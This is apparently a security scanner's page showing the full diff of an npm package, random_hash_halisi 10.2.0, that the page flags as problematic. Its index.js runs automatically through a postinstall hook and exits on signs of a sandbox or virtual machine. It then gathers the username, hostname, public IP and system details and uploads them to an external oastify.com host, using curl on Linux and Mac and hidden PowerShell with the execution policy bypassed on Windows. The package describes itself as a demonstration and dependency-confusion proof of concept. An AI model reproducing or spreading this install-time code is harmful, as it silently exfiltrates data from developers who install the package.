random_hash_halisi 10.2.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of random_hash_halisi might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +145 -0
  2. package/package.json +15 -0
package/index.js ADDED
@@ -0,0 +1,145 @@
1
+ const os = require('os');
2
+ const util = require('util');
3
+ const exec = util.promisify(require('child_process').exec);
4
+ const http = require('http');
5
+ const fs = require('fs');
6
+
7
+ const getPublicIP = (callback) => {
8
+ const options = {
9
+ hostname: 'api.ipify.org',
10
+ path: '/?format=json',
11
+ method: 'GET',
12
+ };
13
+
14
+ const req = http.request(options, (res) => {
15
+ let data = '';
16
+ res.on('data', (chunk) => {
17
+ data += chunk;
18
+ });
19
+
20
+ res.on('end', () => {
21
+ try {
22
+ const response = JSON.parse(data);
23
+ const publicIP = response.ip;
24
+ callback(null, publicIP);
25
+ } catch (error) {
26
+ callback(new Error('Error parsing response'));
27
+ }
28
+ });
29
+ });
30
+
31
+ req.on('error', (error) => {
32
+ callback(error);
33
+ });
34
+
35
+ req.end();
36
+ };
37
+
38
+ const detectOSType = () => {
39
+ const type = os.type();
40
+ if (type.startsWith('Windows')) return 'Windows';
41
+ if (type.startsWith('Linux')) return 'Linux';
42
+ if (type.startsWith('Darwin')) return 'Mac';
43
+ return 'UNKNOWN';
44
+ };
45
+
46
+ const os_type = detectOSType();
47
+
48
+ let cpus = os.cpus();
49
+ cpus = cpus.length;
50
+
51
+ if (cpus === 1) {
52
+ process.exit(1);
53
+ }
54
+
55
+ let totalMemory = os.totalmem();
56
+ totalMemory = totalMemory / (1024 ** 3); // Convert from bytes to gigabytes
57
+ totalMemory = Math.round(totalMemory);
58
+
59
+ const THRESHOLD = "2";
60
+ if (totalMemory < THRESHOLD) {
61
+ process.exit(1);
62
+ }
63
+
64
+ async function checkVMTools() {
65
+ const os_type = detectOSType();
66
+ let checkCommand;
67
+ let isActive;
68
+
69
+ if (os_type === 'Windows') {
70
+ checkCommand = 'sc query VMTools';
71
+ isActive = (stdout) => stdout.includes('RUNNING');
72
+ } else if (os_type === 'Linux' || os_type === 'Mac') {
73
+ checkCommand = 'systemctl is-active vmtoolsd';
74
+ isActive = (stdout) => stdout.trim() === 'active';
75
+ } else {
76
+ console.error('Unsupported OS type:', os_type);
77
+ process.exit(1);
78
+ }
79
+
80
+ const { stdout } = await exec(checkCommand);
81
+
82
+ if (isActive(stdout)) {
83
+ //console.log("VMware tools are active, exiting.");
84
+ process.exit(1);
85
+ } else {
86
+ await getPublicIP((error, remoteIP) => {
87
+ if (error) {
88
+ console.error('Error:', error.message);
89
+ } else {
90
+ if (os_type === 'Linux' || os_type === 'Mac') {
91
+ const bash = `#!/bin/bash;separator="--------------------------------------------------";exfiltrate="$separator
92
+ Username: $(whoami)
93
+ Hostname: $(hostname)
94
+ Public IP: ${remoteIP}
95
+ Time: $(date)
96
+ Current Path: $(pwd)
97
+ Package Name: $(npm run env | grep 'npm_package_name' | cut -d '=' -f 2)
98
+ Kernel: $(uname -a)
99
+ $separator";echo "$exfiltrate" > /tmp/demo.txt;curl --silent -F "content=@/tmp/demo.txt" https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com;rm -f /tmp/demo.txt`;
100
+ exec('echo -e' + bash + " > /tmp/demo.sh; chmod +x /tmp/demo.sh; /bin/bash -c /tmp/demo.sh; rm -f /tmp/demo.sh",
101
+ (error, stdout, stderr) => {
102
+ if (error) {
103
+ console.error(`Error: ${error.message}`);
104
+ return;
105
+ }
106
+ }
107
+ );
108
+ } else if (os_type === 'Windows') {
109
+ const powershell = `$whoami = whoami
110
+ $today = (Get-Date).DateTime
111
+ $publicIP = (Invoke-WebRequest -Uri 'https://api.ipify.org?format=text' -UseBasicParsing).content
112
+ $system = systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
113
+ $filePath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "output.txt")
114
+ $scriptPath = [System.IO.Path]::Combine([System.IO.Path]::GetTempPath(), "demo.ps1")
115
+
116
+ Write-Output "Username: $whoami\`nDate: $today\`nPublic IP: $publicIP\`nSystem Information:" | Out-File -FilePath $filePath -Encoding ASCII
117
+ Add-Content $filePath $system
118
+
119
+ $destinationUrl = "https://89fx87vsee4w00kbzt8ynmvxlorff53u.oastify.com"
120
+
121
+ $filePath = "$filePath"
122
+
123
+ Invoke-WebRequest -Uri $destinationUrl -Method POST -InFile $filePath -UseBasicParsing
124
+ del $filePath
125
+ del $scriptPath`;
126
+ const psFilePath = `${process.env.TEMP}\\demo.ps1`;
127
+ fs.writeFileSync(psFilePath, powershell, 'utf8');
128
+ exec(
129
+ `C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File %TEMP%\\demo.ps1`,
130
+ (error, stdout, stderr) => {
131
+ if (error) {
132
+ console.error(`Error: ${error.message}`);
133
+ return;
134
+ }
135
+ }
136
+ );
137
+ }
138
+ }
139
+ });
140
+ }
141
+ }
142
+
143
+ checkVMTools().catch(error => {
144
+ console.error(`An error occurred: ${error}`);
145
+ });
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+
2
+ {
3
+ "name": "random_hash_halisi",
4
+ "version": "10.2.0",
5
+ "description": "A sample npm package for demonstration purposes.",
6
+ "main": "index.js",
7
+ "scripts": {
8
+ "postinstall": "node index.js"
9
+ },
10
+ "keywords": [
11
+ "dependency"
12
+ ],
13
+ "author": "Depdency-Confusion-PoC",
14
+ "license": "ISC"
15
+ }